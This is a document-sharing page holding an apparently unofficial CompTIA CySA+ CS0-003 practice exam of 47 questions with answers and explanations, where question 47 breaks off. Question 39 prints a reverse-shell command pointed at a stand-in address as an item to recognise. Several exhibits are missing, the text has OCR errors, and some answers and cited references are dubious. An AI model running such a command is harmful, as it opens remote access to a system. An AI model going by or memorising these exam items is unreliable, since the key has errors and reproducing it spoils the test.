CS0-003.pdf
Document Details
Uploaded by StateOfTheArtUnicorn
University of Arizona
CompTIA
Tags
Related
- Certified Cybersecurity Technician PDF
- CompTIA Security+ Certification Exam SY0-701 V14.35 PDF
- Data Backup, Retention, and Destruction (Chapter 15-03) PDF
- CompTIA Security+ (SY0-701) Study Guide PDF
- Unmanned Aircraft Systems (UAS) Certification Exam PDF
- CompTIA Security+ SY0-701 Practice Tests 2024 PDF
Full Transcript
Questions & Answers PDF P-1 CompTIA CS0-003 Exam CompTIA CyberSecurity Analyst CySA+ Certification Exam www.P2PExams.com Questions & Answers PDF...
Questions & Answers PDF P-1 CompTIA CS0-003 Exam CompTIA CyberSecurity Analyst CySA+ Certification Exam www.P2PExams.com Questions & Answers PDF P-2 Product Questions: 323 Version: 10.0 Question: 1 A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiality and integrity but not to availability. Which of the following CVE metrics would be most accurate for this zero-day threat? A. CVSS: 31/AV: N/AC: L/PR: N/UI: N/S: U/C: H/1: K/A: L B. CVSS:31/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L C. CVSS:31/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H D. CVSS:31/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H Answer: A Explanation: This answer matches the description of the zero-day threat. The attack vector is network (AV:N), the attack complexity is low (AC:L), no privileges are required (PR:N), no user interaction is required (UI:N), the scope is unchanged (S:U), the confidentiality and integrity impacts are high (C:H/I:H), and the availability impact is low (A:L). Official Reference: https://nvd.nist.gov/vuln-metrics/cvss Question: 2 Which of the following tools would work best to prevent the exposure of PII outside of an organization? A. PAM B. IDS C. PKI D. DLP Answer: D Explanation: Data loss prevention (DLP) is a tool that can prevent the exposure of PII outside of an organization by monitoring, detecting, and blocking sensitive data in motion, in use, or at rest. Question: 3 www.P2PExams.com Questions & Answers PDF P-3 An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed: Which of the following tuning recommendations should the security analyst share? A. Set an HttpOnlvflaq to force communication by HTTPS B. Block requests without an X-Frame-Options header C. Configure an Access-Control-Allow-Origin header to authorized domains D. Disable the cross-origin resource sharing header Answer: B Explanation: The output shows that the web application is vulnerable to clickjacking attacks, which allow an attacker to overlay a hidden frame on top of a legitimate page and trick users into clicking on malicious links. Blocking requests without an X-Frame-Options header can prevent this attack by instructing the browser to not display the page within a frame. Question: 4 Which of the following items should be included in a vulnerability scan report? (Choose two.) www.P2PExams.com Questions & Answers PDF P-4 A. Lessons learned B. Service-level agreement C. Playbook D. Affected hosts E. Risk score F. Education plan Answer: D, E Explanation: A vulnerability scan report should include information about the affected hosts, such as their IP addresses, hostnames, operating systems, and services. It should also include a risk score for each vulnerability, which indicates the severity and potential impact of the vulnerability on the host and the organization. Official Reference: https://www.first.org/cvss/ Question: 5 The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released. Which of the following would best protect this organization? A. A mean time to remediate of 30 days B. A mean time to detect of 45 days C. A mean time to respond of 15 days D. Third-party application testing Answer: A Explanation: A mean time to remediate (MTTR) is a metric that measures how long it takes to fix a vulnerability after it is discovered. A MTTR of 30 days would best protect the organization from the new attacks that are exploited 45 days after a patch is released, as it would ensure that the vulnerabilities are fixed before they are exploited Question: 6 A security analyst recently joined the team and is trying to determine which scripting language is being used in a production script to determine if it is malicious. Given the following script: www.P2PExams.com Questions & Answers PDF P-5 Which of the following scripting languages was used in the script? A. PowerShel B. Ruby C. Python D. Shell script Answer: A Explanation: The script uses PowerShell syntax, such as cmdlets, parameters, variables, and comments. PowerShell is a scripting language that can be used to automate tasks and manage systems. Question: 7 A company's user accounts have been compromised. Users are also reporting that the company's internal portal is sometimes only accessible through HTTP, other times; it is accessible through HTTPS. Which of the following most likely describes the observed activity? A. There is an issue with the SSL certificate causinq port 443 to become unavailable for HTTPS access B. An on-path attack is being performed by someone with internal access that forces users into port 80 C. The web server cannot handle an increasing amount of HTTPS requests so it forwards users to port 80 D. An error was caused by BGP due to new rules applied over the company's internal routers Answer: B Explanation: An on-path attack is a type of man-in-the-middle attack where an attacker intercepts and modifies network traffic between two parties. In this case, someone with internal access may be performing an on-path attack by forcing users into port 80, which is used for HTTP communication, instead of port 443, which is used for HTTPS communication. This would allow the attacker to compromise the user accounts and access the company’s internal portal. Question: 8 A security analyst is tasked with prioritizing vulnerabilities for remediation. The relevant company www.P2PExams.com Questions & Answers PDF P-6 security policies are shown below: Security Policy 1006: Vulnerability Management 1. The Company shall use the CVSSv3.1 Base Score Metrics (Exploitability and Impact) to prioritize the remediation of security vulnerabilities. 2. In situations where a choice must be made between confidentiality and availability, the Company shall prioritize confidentiality of data over availability of systems and data. 3. The Company shall prioritize patching of publicly available systems and services over patching of internally available system. According to the security policy, which of the following vulnerabilities should be the highest priority to patch? A) B) C) D) A. Option A B. Option B C. Option C D. Option D Answer: C Explanation: According to the security policy, the company shall use the CVSSv3.1 Base Score Metrics to prioritize the remediation of security vulnerabilities. Option C has the highest CVSSv3.1 Base Score of 9.8, which indicates a critical severity level. The company shall also prioritize confidentiality of data over availability of systems and data, and option C has a high impact on confidentiality (C:H). Finally, the company shall prioritize patching of publicly available systems and services over patching of internally available systems, and option C affects a public-facing web server. Official Reference: https://www.first.org/cvss/ Question: 9 www.P2PExams.com Questions & Answers PDF P-7 Which of the following will most likely ensure that mission-critical services are available in the event of an incident? A. Business continuity plan B. Vulnerability management plan C. Disaster recovery plan D. Asset management plan Answer: C Explanation: Question: 10 The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several high-risk cloud applications are used that increase the risk to the organization. Which of the following solutions will assist in reducing the risk? A. Deploy a CASB and enable policy enforcement B. Configure MFA with strict access C. Deploy an API gateway D. Enable SSO to the cloud applications Answer: A Explanation: A cloud access security broker (CASB) is a tool that can help reduce the risk of shadow IT in the enterprise by providing visibility and control over cloud applications and services. A CASB can enable policy enforcement by blocking unauthorized or risky cloud applications, enforcing data loss prevention rules, encrypting sensitive data, and detecting anomalous user behavior. Question: 11 An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from accessing external SaaS resources. The team determines the organization was impacted by a DDoS attack. Which of the following logs should the team review first? A. CDN B. Vulnerability scanner C. DNS D. Web server Answer: C Explanation: A distributed denial-of-service (DDoS) attack is a type of cyberattack that aims to overwhelm a www.P2PExams.com Questions & Answers PDF P-8 target’s network or server with a large volume of traffic from multiple sources. A common technique for launching a DDoS attack is to compromise DNS servers, which are responsible for resolving domain names into IP addresses. By flooding DNS servers with malicious requests, attackers can disrupt the normal functioning of the internet and prevent users from accessing external SaaS resources. Official Reference: https://www.eccouncil.org/cybersecurity-exchange/threat- intelligence/cyber-kill-chain-seven-steps-cyberattack/ Question: 12 A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attack. Which of the following best describes the current stage of the Cyber Kill Chain that the threat actor is currently operating in? A. Weaponization B. Reconnaissance C. Delivery D. Exploitation Answer: D Explanation: The Cyber Kill Chain is a framework that describes the stages of a cyberattack from reconnaissance to actions on objectives. The exploitation stage is where attackers take advantage of the vulnerabilities they have discovered in previous stages to further infiltrate a target’s network and achieve their objectives. In this case, the malicious actor has gained access to an internal network by means of social engineering and does not want to lose access in order to continue the attack. This indicates that the actor is in the exploitation stage of the Cyber Kill Chain. Official Reference: https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html Question: 13 An analyst finds that an IP address outside of the company network that is being used to run network and vulnerability scans across external-facing assets. Which of the following steps of an attack framework is the analyst witnessing? A. Exploitation B. Reconnaissance C. Command and control D. Actions on objectives Answer: B Explanation: Reconnaissance is the first stage in the Cyber Kill Chain and involves researching potential targets before carrying out any penetration testing. The reconnaissance stage may include identifying potential targets, finding their vulnerabilities, discovering which third parties are connected to them (and what data they can access), and exploring existing entry points as well as finding new ones. www.P2PExams.com Questions & Answers PDF P-9 Reconnaissance can take place both online and offline. In this case, an analyst finds that an IP address outside of the company network is being used to run network and vulnerability scans across external-facing assets. This indicates that the analyst is witnessing reconnaissance activity by an attacker. Official Reference: https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill- chain.html Question: 14 An incident response analyst notices multiple emails traversing the network that target only the administrators of the company. The email contains a concealed URL that leads to an unknown website in another country. Which of the following best describes what is happening? (Choose two.) A. Beaconinq B. Domain Name System hijacking C. Social engineering attack D. On-path attack E. Obfuscated links F. Address Resolution Protocol poisoning Answer: C, E Explanation: A social engineering attack is a type of cyberattack that relies on manipulating human psychology rather than exploiting technical vulnerabilities. A social engineering attack may involve deceiving, persuading, or coercing users into performing actions that benefit the attacker, such as clicking on malicious links, divulging sensitive information, or granting access to restricted resources. An obfuscated link is a link that has been disguised or altered to hide its true destination or purpose. Obfuscated links are often used by attackers to trick users into visiting malicious websites or downloading malware. In this case, an incident response analyst notices multiple emails traversing the network that target only the administrators of the company. The email contains a concealed URL that leads to an unknown website in another country. This indicates that the analyst is witnessing a social engineering attack using obfuscated links. Question: 15 During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would best mitigate this problem if applied along the SDLC phase? A. Conduct regular red team exercises over the application in production B. Ensure that all implemented coding libraries are regularly checked C. Use application security scanning as part of the pipeline for the CI/CDflow D. Implement proper input validation for any data entry form Answer: C Explanation: www.P2PExams.com Questions & Answers PDF P-10 P- Application security scanning is a process that involves testing and analyzing applications for security vulnerabilities, such as injection flaws, broken authentication, cross-site scripting, and insecure configuration. Application security scanning can help identify and fix security issues before they become exploitable by attackers. Using application security scanning as part of the pipeline for the continuous integration/continuous delivery (CI/CD) flow can help mitigate the problem of finding the same vulnerabilities in a critical application during security scanning. This is because application security scanning can be integrated into the development lifecycle and performed automatically and frequently as part of the CI/CD process. Question: 16 An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The analyst finds that most systems can be upgraded with a reboot resulting in a single downtime window. However, two of the critical systems cannot be upgraded due to a vendor appliance that the company does not have access to. Which of the following inhibitors to remediation do these systems and associated vulnerabilities best represent? A. Proprietary systems B. Legacy systems C. Unsupported operating systems D. Lack of maintenance windows Answer: A Explanation: Proprietary systems are systems that are owned and controlled by a specific vendor or manufacturer, and that use proprietary standards or protocols that are not compatible with other systems. Proprietary systems can pose a challenge for vulnerability management, as they may not allow users to access or modify their configuration, update their software, or patch their vulnerabilities. In this case, two of the critical systems cannot be upgraded due to a vendor appliance that the company does not have access to. This indicates that these systems and associated vulnerabilities are examples of proprietary systems as inhibitors to remediation Question: 17 The security team reviews a web server for XSS and runs the following Nmap scan: www.P2PExams.com Questions & Answers PDF P-11 P- Which of the following most accurately describes the result of the scan? A. An output of characters > and " as the parameters used m the attempt B. The vulnerable parameter ID hccp://l72.31.15.2/1.php?id-2 and unfiltered characters returned C. The vulnerable parameter and unfiltered or encoded characters passed > and " as unsafe D. The vulnerable parameter and characters > and " with a reflected XSS attempt Answer: D Explanation: A cross-site scripting (XSS) attack is a type of web application attack that injects malicious code into a web page that is then executed by the browser of a victim user. A reflected XSS attack is a type of XSS attack where the malicious code is embedded in a URL or a form parameter that is sent to the web server and then reflected back to the user’s browser. In this case, the Nmap scan shows that the web server is vulnerable to a reflected XSS attack, as it returns the characters > and " without any filtering or encoding. The vulnerable parameter is id in the URL http://172.31.15.2/1.php?id=2. Question: 18 Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future? A. Develop a call tree to inform impacted users B. Schedule a review with all teams to discuss what occurred C. Create an executive summary to update company leadership D. Review regulatory compliance with public relations for official notification Answer: B Explanation: One of the best actions to take after the conclusion of a security incident to improve incident response in the future is to schedule a review with all teams to discuss what occurred, what went well, what went wrong, and what can be improved. This review is also known as a lessons learned session or an after-action report. The purpose of this review is to identify the root causes of the incident, evaluate the effectiveness of the incident response process, document any gaps or weaknesses in the security controls, and recommend corrective actions or preventive measures for future incidents. Official Reference: https://www.eccouncil.org/cybersecurity-exchange/threat- intelligence/cyber-kill-chain-seven-steps-cyberattack/ Question: 19 A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis? A. Code analysis B. Static analysis www.P2PExams.com Questions & Answers PDF P-12 P- C. Reverse engineering D. Fuzzing Answer: C Explanation: Reverse engineering is a technique that involves analyzing a binary file to understand its structure, functionality, and behavior. Reverse engineering can help security analysts perform malware analysis, vulnerability research, exploit development, and software debugging. Reverse engineering can be done using various tools, such as disassemblers, debuggers, decompilers, and hex editors. Question: 20 An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server? A. Hard disk B. Primary boot partition C. Malicious tiles D. Routing table E. Static IP address Answer: A Explanation: The hard disk is the piece of data that should be collected first in order to preserve sensitive information before isolating the server. The hard disk contains all the files and data stored on the server, which may include evidence of malicious activity, such as malware installation, data exfiltration, or configuration changes. The hard disk should be collected using proper forensic techniques, such as creating an image or a copy of the disk and maintaining its integrity using hashing algorithms. Question: 21 Which of the following security operations tasks are ideal for automation? A. Suspicious file analysis: Look for suspicious-looking graphics in a folder. Create subfolders in the original folder based on category of graphics found. Move the suspicious graphics to the appropriate subfolder B. Firewall IoC block actions: Examine the firewall logs for IoCs from the most recently published zero-day exploit Take mitigating actions in the firewall to block the behavior found in the logs Follow up on any false positives that were caused by the block rules C. Security application user errors: Search the error logs for signs of users having trouble with the security application www.P2PExams.com Questions & Answers PDF P-13 P- Look up the user's phone number Call the user to help with any questions about using the application D. Email header analysis: Check the email header for a phishing confidence metric greater than or equal to five Add the domain of sender to the block list Move the email to quarantine Answer: D Explanation: Email header analysis is one of the security operations tasks that are ideal for automation. Email header analysis involves checking the email header for various indicators of phishing or spamming attempts, such as sender address spoofing, mismatched domains, suspicious subject lines, or phishing confidence metrics. Email header analysis can be automated using tools or scripts that can parse and analyze email headers and take appropriate actions based on predefined rules or thresholds Question: 22 An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of the following groups should the organization report the breach to? A. PCI Security Standards Council B. Local law enforcement C. Federal law enforcement D. Card issuer Answer: D Explanation: Under the terms of PCI DSS, an organization that has experienced a breach of customer transactions should report the breach to the card issuer. The card issuer is the financial institution that issues the payment cards to the customers and that is responsible for authorizing and processing the transactions. The card issuer may have specific reporting requirements and procedures for the organization to follow in the event of a breach. The organization should also notify other parties that may be affected by the breach, such as customers, law enforcement, or regulators, depending on the nature and scope of the breach. Official Reference: https://www.pcisecuritystandards.org/ Question: 23 Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system? A. Mean time to detect B. Number of exploits by tactic C. Alert volume D. Quantity of intrusion attempts www.P2PExams.com Questions & Answers PDF P-14 P- Answer: A Explanation: Mean time to detect (MTTD) is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system. MTTD is a metric that measures how long it takes to detect a security incident or threat from the time it occurs. MTTD can be improved by using tools and processes that can collect, correlate, analyze, and alert on security data from various sources. SIEM, SOAR, and ticketing systems are examples of such tools and processes that can help reduce MTTD and enhance security operations. Official Reference: https://www.eccouncil.org/cybersecurity- exchange/threat-intelligence/cyber-kill-chain-seven-steps-cyberattack Question: 24 A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid IaaS cloud environment. Which of the following implications should be considered on the new hybrid environment? A. The current scanners should be migrated to the cloud B. Cloud-specific misconfigurations may not be detected by the current scanners C. Existing vulnerability scanners cannot scan laaS systems D. Vulnerability scans on cloud environments should be performed from the cloud Answer: B Explanation: Cloud-specific misconfigurations are security issues that arise from improper or inadequate configuration of cloud resources, such as storage buckets, databases, virtual machines, or containers. Cloud-specific misconfigurations may not be detected by the current scanners that are designed for on-premises environments, as they may not have the visibility or access to the cloud resources or the cloud provider’s APIs. Therefore, one of the implications that should be considered on the new hybrid environment is that cloud-specific misconfigurations may not be detected by the current scanners. Question: 25 A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the authentication logs, web logs, and temporary files, reflecting the web searches from the user's workstation, to build the case for the investigation. Which of the following is the best way to ensure that the investigation complies with HR or privacy policies? A. Create a timeline of events detailinq the date stamps, user account hostname and IP information associated with the activities B. Ensure that the case details do not reflect any user-identifiable information Password protect the evidence and restrict access to personnel related to the investigation C. Create a code name for the investigation in the ticketing system so that all personnel with access www.P2PExams.com Questions & Answers PDF P-15 P- will not be able to easily identity the case as an HR-related investigation D. Notify the SOC manager for awareness after confirmation that the activity was intentional Answer: B Explanation: The best way to ensure that the investigation complies with HR or privacy policies is to ensure that the case details do not reflect any user-identifiable information, such as name, email address, phone number, or employee ID. This can help protect the privacy and confidentiality of the user and prevent any potential discrimination or retaliation. Additionally, password protecting the evidence and restricting access to personnel related to the investigation can help preserve the integrity and security of the evidence and prevent any unauthorized or accidental disclosure or modification. Question: 26 Which of the following is the first step that should be performed when establishing a disaster recovery plan? A. Agree on the goals and objectives of the plan B. Determine the site to be used during a disaster C Demonstrate adherence to a standard disaster recovery process D. Identity applications to be run during a disaster Answer: A Explanation: The first step that should be performed when establishing a disaster recovery plan is to agree on the goals and objectives of the plan. The goals and objectives of the plan should define what the plan aims to achieve, such as minimizing downtime, restoring critical functions, ensuring data integrity, or meeting compliance requirements. The goals and objectives of the plan should also be aligned with the business needs and priorities of the organization and be measurable and achievable. Question: 27 A technician identifies a vulnerability on a server and applies a software patch. Which of the following should be the next step in the remediation process? A. Testing B. Implementation C. Validation D. Rollback Answer: C Explanation: The next step in the remediation process after applying a software patch is validation. Validation is a process that involves verifying that the patch has been successfully applied, that it has fixed the www.P2PExams.com Questions & Answers PDF P-16 P- vulnerability, and that it has not caused any adverse effects on the system or application functionality or performance. Validation can be done using various methods, such as scanning, testing, monitoring, or auditing. Question: 28 The analyst reviews the following endpoint log entry: Which of the following has occurred? A. Registry change B. Rename computer C. New account introduced D. Privilege escalation Answer: C Explanation: The endpoint log entry shows that a new account named “admin” has been created on a Windows system with a local group membership of “Administrators”. This indicates that a new account has been introduced on the system with administrative privileges. This could be a sign of malicious activity, such as privilege escalation or backdoor creation, by an attacker who has compromised the system. Question: 29 A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. Which of the following best describes what the security program did? A. Data enrichment B. Security control plane C. Threat feed combination D. Single pane of glass Answer: D Explanation: A single pane of glass is a term that describes a unified view or interface that integrates multiple www.P2PExams.com Questions & Answers PDF P-17 P- tools or data sources into one dashboard or console. A single pane of glass can help improve security operations by providing visibility, correlation, analysis, and alerting capabilities across various security controls and systems. A single pane of glass can also help reduce complexity, improve efficiency, and enhance decision making for security analysts. In this case, a security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM, which provides a single pane of glass for security operations. Official Reference: https://www.eccouncil.org/cybersecurity-exchange/threat-intelligence/cyber-kill-chain-seven-steps- cyberattack Question: 30 Due to reports of unauthorized activity that was occurring on the internal network, an analyst is performing a network discovery. The analyst runs an Nmap scan against a corporate network to evaluate which devices were operating in the environment. Given the following output: www.P2PExams.com Questions & Answers PDF P-18 P- www.P2PExams.com Questions & Answers PDF P-19 P- Which of the following choices should the analyst look at first? A. wh4dc-748gy.lan (192.168.86.152) B. lan (192.168.86.22) C. imaging.lan (192.168.86.150) D. xlaptop.lan (192.168.86.249) E. p4wnp1_aloa.lan (192.168.86.56) Answer: E Explanation: The analyst should look at p4wnp1_aloa.lan (192.168.86.56) first, as this is the most suspicious device on the network. P4wnP1 ALOA is a tool that can be used to create a malicious USB device that can perform various attacks, such as keystroke injection, network sniffing, man-in-the-middle, or backdoor creation. The presence of a device with this name on the network could indicate that an attacker has plugged in a malicious USB device to a system and gained access to the network. Official Reference: https://github.com/mame82/P4wnP1_aloa Question: 31 When starting an investigation, which of the following must be done first? A. Notify law enforcement B. Secure the scene C. Seize all related evidence D. Interview the witnesses Answer: B Explanation: The first thing that must be done when starting an investigation is to secure the scene. Securing the scene involves isolating and protecting the area where the incident occurred, as well as any potential evidence or witnesses. Securing the scene can help prevent any tampering, contamination, or destruction of evidence, as well as any interference or obstruction of the investigation. Question: 32 Which of the following describes how a CSIRT lead determines who should be communicated with and when during a security incident? A. The lead should review what is documented in the incident response policy or plan B. Management level members of the CSIRT should make that decision C. The lead has the authority to decide who to communicate with at any t me D. Subject matter experts on the team should communicate with others within the specified area of expertise www.P2PExams.com Questions & Answers PDF P-20 P- Answer: A Explanation: The incident response policy or plan is a document that defines the roles and responsibilities, procedures and processes, communication and escalation protocols, and reporting and documentation requirements for handling security incidents. The lead should review what is documented in the incident response policy or plan to determine who should be communicated with and when during a security incident, as well as what information should be shared and how. The incident response policy or plan should also be aligned with the organizational policies and legal obligations regarding incident notification and disclosure. Question: 33 A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization. Which of the following will produce the data needed for the briefing? A. Firewall logs B. Indicators of compromise C. Risk assessment D. Access control lists Answer: B Explanation: Indicators of compromise (IoCs) are pieces of data or evidence that suggest a system or network has been compromised by an attacker or malware. IoCs can include IP addresses, domain names, URLs, file hashes, registry keys, network traffic patterns, user behaviors, or system anomalies. IoCs can be used to detect, analyze, and respond to security incidents, as well as to share threat intelligence with other organizations or authorities. IoCs can produce the data needed for an executive briefing on possible threats to the organization, as they can provide information on the source, nature, scope, impact, and mitigation of the threats. Question: 34 An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country. Which of the following describes what the analyst has noticed? A. Beaconing B. Cross-site scripting C. Buffer overflow D. PHP traversal Answer: A Explanation: www.P2PExams.com Questions & Answers PDF P-21 P- Question: 35 A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not showing the packets containing the file transfer itself. Which of the following can the analyst perform to see the entire contents of the downloaded files? A. Change the display filter to f cp. accive. pore B. Change the display filter to tcg.port=20 C. Change the display filter to f cp-daca and follow the TCP streams D. Navigate to the File menu and select FTP from the Export objects option Answer: C Explanation: The best way to see the entire contents of the downloaded files in Wireshark is to change the display filter to ftp-data and follow the TCP streams. FTP-data is a protocol that is used to transfer files between an FTP client and server using TCP port 20. By filtering for ftp-data packets and following the TCP streams, the analyst can see the actual file data that was transferred during the FTP session Question: 36 A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago: but the report did not have a follow-up remediation response from an analyst. Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer? A. SLA B. MOU C. NDA D. Limitation of liability Answer: A Explanation: SLA stands for service level agreement, which is a contract or document that defines the expectations and obligations between a service provider and a customer regarding the quality, availability, performance, or scope of a service. An SLA may also specify the metrics, penalties, or remedies for measuring or ensuring compliance with the agreed service levels. An SLA can help the SOC manager review if the team is meeting the appropriate contractual obligations for the customer, such as response time, resolution time, reporting frequency, or communication channels. Question: 37 Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target? www.P2PExams.com Questions & Answers PDF P-22 P- A. Command and control B. Actions on objectives C. Exploitation D. Delivery Answer: A Explanation: Command and control (C2) is a phase of the Cyber Kill Chain that involves the adversary attempting to establish communication with a successfully exploited target. C2 enables the adversary to remotely control or manipulate the target system or network using various methods, such as malware callbacks, backdoors, botnets, or covert channels. C2 allows the adversary to maintain persistence, exfiltrate data, execute commands, deliver payloads, or spread to other systems or networks. Question: 38 A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement? A. External B. Agent-based C. Non-credentialed D. Credentialed Answer: B Explanation: Agent-based vulnerability scanning is a method that involves installing software agents on the target systems or networks that can perform local scans and report the results to a central server or console. Agent-based vulnerability scanning can reduce network traffic, as the scans are performed locally and only the results are transmitted over the network. Agent-based vulnerability scanning can also provide more accurate and up-to-date results, as the agents can scan continuously or on- demand, regardless of the system or network status or location. Question: 39 A security analyst detects an exploit attempt containing the following command: sh -i >& /dev/udp/10.1.1.1/4821 0>$l Which of the following is being attempted? A. RCE B. Reverse shell www.P2PExams.com Questions & Answers PDF P-23 P- C. XSS D. SQL injection Answer: B Explanation: A reverse shell is a type of shell access that allows a remote user to execute commands on a target system or network by reversing the normal direction of communication. A reverse shell is usually created by running a malicious script or program on the target system that connects back to the remote user’s system and opens a shell session. A reverse shell can bypass firewalls or other security controls that block incoming connections, as it uses an outgoing connection initiated by the target system. In this case, the security analyst has detected an exploit attempt containing the following command: sh -i >& /dev/udp/10.1.1.1/4821 0>$l This command is a shell script that creates a reverse shell connection from the target system to the remote user’s system at IP address 10.1.1.1 and port 4821 using UDP protocol. Question: 40 An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation? A. Scope B. Weaponization C. CVSS D. Asset value Answer: B Explanation: Weaponization is a factor that describes how an adversary develops or acquires an exploit or payload that can take advantage of a vulnerability and deliver a malicious effect. Weaponization can increase the severity or impact of a vulnerability, as it makes it easier or more likely for an attacker to exploit it successfully and cause damage or harm. Weaponization can also indicate the level of sophistication or motivation of an attacker, as well as the availability or popularity of an exploit or payload in the cyber threat landscape. In this case, an older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. This indicates that weaponization was the reason for this escalation. Question: 41 An analyst is reviewing a vulnerability report for a server environment with the following entries: www.P2PExams.com Questions & Answers PDF P-24 P- Which of the following systems should be prioritized for patching first? A. 10.101.27.98 B. 54.73.225.17 C. 54.74.110.26 D. 54.74.110.228 Answer: D Explanation: The system that should be prioritized for patching first is 54.74.110.228, as it has the highest number and severity of vulnerabilities among the four systems listed in the vulnerability report. According to the report, this system has 12 vulnerabilities, with 8 critical, 3 high, and 1 medium severity ratings. The critical vulnerabilities include CVE-2019-0708 (BlueKeep), CVE-2019-1182 (DejaBlue), CVE-2017- 0144 (EternalBlue), and CVE-2017-0145 (EternalRomance), which are all remote code execution www.P2PExams.com Questions & Answers PDF P-25 P- vulnerabilities that can allow an attacker to compromise the system without any user interaction or authentication. These vulnerabilities pose a high risk to the system and should be patched as soon as possible. Question: 42 A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive dat a. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results? A. Credentialed network scanning B. Passive scanning C. Agent-based scanning D. Dynamic scanning Answer: C Explanation: Agent-based scanning is a method that involves installing software agents on the target systems or networks that can perform local scans and report the results to a central server or console. Agent- based scanning can reduce the access to systems, as the agents do not require any credentials or permissions to scan the local system or network. Agent-based scanning can also provide the most accurate vulnerability scan results, as the agents can scan continuously or on-demand, regardless of the system or network status or location. Question: 43 A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the objective most accurately? A. function x() { info=$(geoiplookup $1) && echo "$1 | $info" } B. function x() { info=$(ping -c 1 $1 | awk -F "/" ’END{print $5}’) && echo "$1 | $info" } C. function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" ’{print $1} ').origin.asn.cymru.com TXT +short) && echo "$1 | $info" } D. function x() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo "$1 | $info" } Answer: C Explanation: The function that can be used on a shell script to identify anomalies on the network routing most accurately is: function x() { info=(dig(dig -x $1 | grep PTR | tail -n 1 | awk -F “.in-addr” ’{print $1} ').origin.asn.cymru.com TXT +short) && echo “$1 | $info” } This function takes an IP address as an argument and performs two DNS lookups using the dig command. The first lookup uses the -x option to perform a reverse DNS lookup and get the hostname associated with the IP address. The second lookup uses the origin.asn.cymru.com domain to get the www.P2PExams.com Questions & Answers PDF P-26 P- autonomous system number (ASN) and other information related to the IP address. The function then prints the IP address and the ASN information, which can help identify any routing anomalies or inconsistencies Question: 44 There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario? A. Implement step-up authentication for administrators B. Improve employee training and awareness C. Increase password complexity standards D. Deploy mobile device management Answer: B Explanation: The best security control to implement against sensitive information being disclosed via file sharing services is to improve employee training and awareness. Employee training and awareness can help educate employees on the risks and consequences of using file sharing services for sensitive information, as well as the policies and procedures for handling such information securely and appropriately. Employee training and awareness can also help foster a security culture and encourage employees to report any incidents or violations of information security. Question: 45 Which of the following is the best way to begin preparation for a report titled "What We Learned" regarding a recent incident involving a cybersecurity breach? A. Determine the sophistication of the audience that the report is meant for B. Include references and sources of information on the first page C. Include a table of contents outlining the entire report D. Decide on the color scheme that will effectively communicate the metrics Answer: A Explanation: The best way to begin preparation for a report titled “What We Learned” regarding a recent incident involving a cybersecurity breach is to determine the sophistication of the audience that the report is meant for. The sophistication of the audience refers to their level of technical knowledge, understanding, or interest in cybersecurity topics. Determining the sophistication of the audience can help tailor the report content, language, tone, and format to suit their needs and expectations. For example, a report for executive management may be more concise, high-level, and business- oriented than a report for technical staff or peers. Question: 46 www.P2PExams.com Questions & Answers PDF P-27 P- A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclosing information to the attackers. Which of the following actions would allow the analyst to achieve the objective? A. Upload the binary to an air gapped sandbox for analysis B. Send the binaries to the antivirus vendor C. Execute the binaries on an environment with internet connectivity D. Query the file hashes using VirusTotal Answer: A Explanation: The best action that would allow the analyst to gather intelligence without disclosing information to the attackers is to upload the binary to an air gapped sandbox for analysis. An air gapped sandbox is an isolated environment that has no connection to any external network or system. Uploading the binary to an air gapped sandbox can prevent any communication or interaction between the binary and the attackers, as well as any potential harm or infection to other systems or networks. An air gapped sandbox can also allow the analyst to safely analyze and observe the behavior, functionality, or characteristics of the binary. Question: 47 Which of the following would help to minimize human engagement and aid in process improvement in security operations? A. 